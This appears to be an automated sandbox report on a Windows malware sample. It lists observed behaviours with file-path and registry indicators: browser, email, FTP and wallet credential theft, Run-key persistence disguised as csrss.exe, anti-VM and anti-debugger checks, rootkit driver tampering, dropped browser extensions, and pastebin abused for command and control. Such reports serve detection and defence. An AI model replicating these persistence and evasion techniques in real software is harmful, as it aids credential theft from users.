N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida

UPX packed file

upx

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\b04vaIYl7t9GKnLT4gGKsr1W.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\YbOhszK.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\mVqQIGUXDOgrC\feITmxR.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\NANOZXe.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\lwnFiLS.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\tnLDIQD.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\UnqLSRy.xml C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\LCifMpYymZWU2\LjcpulfHaxToA.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\mVqQIGUXDOgrC\ASJceUC.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\yvWovCiVU\jplHxo.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A
File created C:\Program Files (x86)\gbPxNkbXHfUn\qQKFSEI.dll C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\FTXCzbcEvROqagNdd.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
File created C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\fYmZfMjQZC7bcgTgxzU4okLP.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\RW0Wiuz2PCYu43eGZVwdlZGN.exe N/A
File opened for modification C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Windows\windefender.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-792 = "SA Western Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\Pictures\wwBOAPkgANJgdWjG6GOEj92T.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
